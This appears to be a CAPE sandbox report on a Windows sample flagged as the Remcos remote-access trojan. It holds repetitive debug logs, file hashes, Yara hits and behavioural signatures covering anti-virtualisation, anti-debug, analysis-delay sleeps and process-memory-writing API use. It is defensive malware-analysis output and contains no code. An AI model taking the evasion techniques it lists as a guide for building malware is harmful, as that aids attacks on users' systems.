2020-03-24 10:16:38,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,770 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,770 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,770 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,927 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,927 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,927 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,380 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,380 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,394 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:39,394 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:39,411 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:39,411 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:39,427 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:39,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:39,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:39,427 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:39,441 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:39,441 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:39,441 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:39,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,489 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:39,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:39,489 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:39,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:39,505 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:39,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:39,519 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:39,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:39,519 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:39,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:39,536 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:39,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:39,551 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:39,551 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:39,551 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:39,551 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:39,566 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:39,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:39,582 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:39,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:39,582 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:39,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:39,598 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:39,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:39,614 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:39,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:39,614 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00430000
2020-03-24 10:16:39,628 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00453020
2020-03-24 10:16:39,661 [root] DEBUG: Module image dump success C:\uGrmFZ\CAPE\1540_56812516235161024232020
2020-03-24 10:16:39,676 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x430ffc, size: 0x320
2020-03-24 10:16:39,676 [root] DEBUG: IAT parsing finished, found 189 valid APIs, missed 0 APIs
2020-03-24 10:16:39,691 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:16:39,691 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:16:39,691 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:16:39,707 [root] DEBUG: Adding module to module list: psapi.dll
2020-03-24 10:16:39,707 [root] DEBUG: Adding module to module list: rpcrt4.dll
2020-03-24 10:16:39,707 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:16:39,723 [root] DEBUG: Adding module to module list: wintrust.dll
2020-03-24 10:16:39,723 [root] DEBUG: Adding module to module list: iertutil.dll
2020-03-24 10:16:39,723 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:16:39,739 [root] DEBUG: Adding module to module list: ole32.dll
2020-03-24 10:16:39,739 [root] DEBUG: Adding module to module list: urlmon.dll
2020-03-24 10:16:39,739 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:16:39,753 [root] DEBUG: Successfully built new import table, saving fixed file to disk.
2020-03-24 10:16:39,769 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1540_110768386439161024232020
2020-03-24 10:16:39,769 [root] DEBUG: Import table rebuild success.
2020-03-24 10:16:40,112 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1540.dmp.
2020-03-24 10:16:40,112 [lib.api.process] INFO: Termination confirmed for process 1540
2020-03-24 10:16:40,112 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1540
2020-03-24 10:16:40,112 [root] INFO: Terminate event set for process 1540.
2020-03-24 10:16:40,112 [root] INFO: Terminating process 1540 before shutdown.
2020-03-24 10:16:40,128 [root] INFO: Shutting down package.
2020-03-24 10:16:45,759 [lib.api.process] WARNING: Upload of memory dump for process 1540 failed.
2020-03-24 10:16:45,776 [root] INFO: Stopping auxiliary modules.
2020-03-24 10:16:45,776 [root] INFO: Finishing auxiliary modules.
2020-03-24 10:16:45,776 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 10:16:45,790 [root] WARNING: File at path "C:\uGrmFZ\debugger" does not exist, skip.
2020-03-24 10:16:45,790 [root] WARNING: Monitor injection attempted but failed for process 1380.
2020-03-24 10:16:45,790 [root] WARNING: Monitor injection attempted but failed for process 2788.
2020-03-24 10:16:45,790 [root] INFO: Analysis completed.

MalScore

10.0

Remcos

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2020-03-24 10:13:01 2020-03-24 10:17:15

File Details

File Name 0dc4c453de0a35cbb20a981abf0188cb6a68c0c157dec00c0ff78a880be9e1d2
File Size 1510412 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 363fdee4d80b4995d2154c30b5cdb7df
SHA1 f6d4ba9ca21aecdef07f4179fa502a4189abd83d
SHA256 0dc4c453de0a35cbb20a981abf0188cb6a68c0c157dec00c0ff78a880be9e1d2
SHA512 66e4e85048be76ef86757d3c660b7e4fa548c7b40286e5d0c5db3d7a730f181992402e5a17d9557f6cc64fc3ed461812d3790c15a82e3e5d0862ebbdf4834c35
CRC32 B768E3F6
Ssdeep 24576:piCHzdM5WwUV9TKowNux2kbd48YUpdXtFoLcAngZG0pI4cDvXnN1moajOmABsvWc:piBUZ
TrID
  • 68.2% (.EXE) Win32 Executable Borland Delphi 7 (664796/42/58)
  • 26.9% (.EXE) Win32 Executable Borland Delphi 6 (262638/61)
  • 1.4% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  • 1.3% (.SCR) Windows screen saver (13101/52/3)
  • 0.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
ClamAV None matched
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 0 trigged the Yara rule 'vmdetect'
Hit: PID 0 trigged the Yara rule 'embedded_win_api'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: iz3Ehm6t.exe, PID 1964
A process attempted to delay the analysis task.
Process: ieinstal.exe tried to sleep 333 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/AnimateWindow
DynamicLoader: comctl32.dll/InitializeFlatSB
DynamicLoader: comctl32.dll/UninitializeFlatSB
DynamicLoader: comctl32.dll/FlatSB_GetScrollProp
DynamicLoader: comctl32.dll/FlatSB_SetScrollProp
DynamicLoader: comctl32.dll/FlatSB_EnableScrollBar
DynamicLoader: comctl32.dll/FlatSB_ShowScrollBar
DynamicLoader: comctl32.dll/FlatSB_GetScrollRange
DynamicLoader: comctl32.dll/FlatSB_GetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_GetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_SetScrollRange
DynamicLoader: USER32.dll/SetLayeredWindowAttributes
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/InterlockedDecrement
DynamicLoader: kernel32.dll/InterlockedIncrement
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/MultiByteToWideChar
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/GetThreadLocale
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocaleInfoA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetCommandLineA
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/UnhandledExceptionFilter
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/RtlUnwind
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: USER32.dll/GetKeyboardType
DynamicLoader: USER32.dll/LoadStringA
DynamicLoader: USER32.dll/MessageBoxA
DynamicLoader: USER32.dll/CharNextA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: oleaut32.dll/SysFreeString
DynamicLoader: oleaut32.dll/SysReAllocStringLen
DynamicLoader: oleaut32.dll/SysAllocStringLen
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/TlsFree
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegFlushKey
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/SizeofResource
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/ReadProcessMemory
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/LockResource
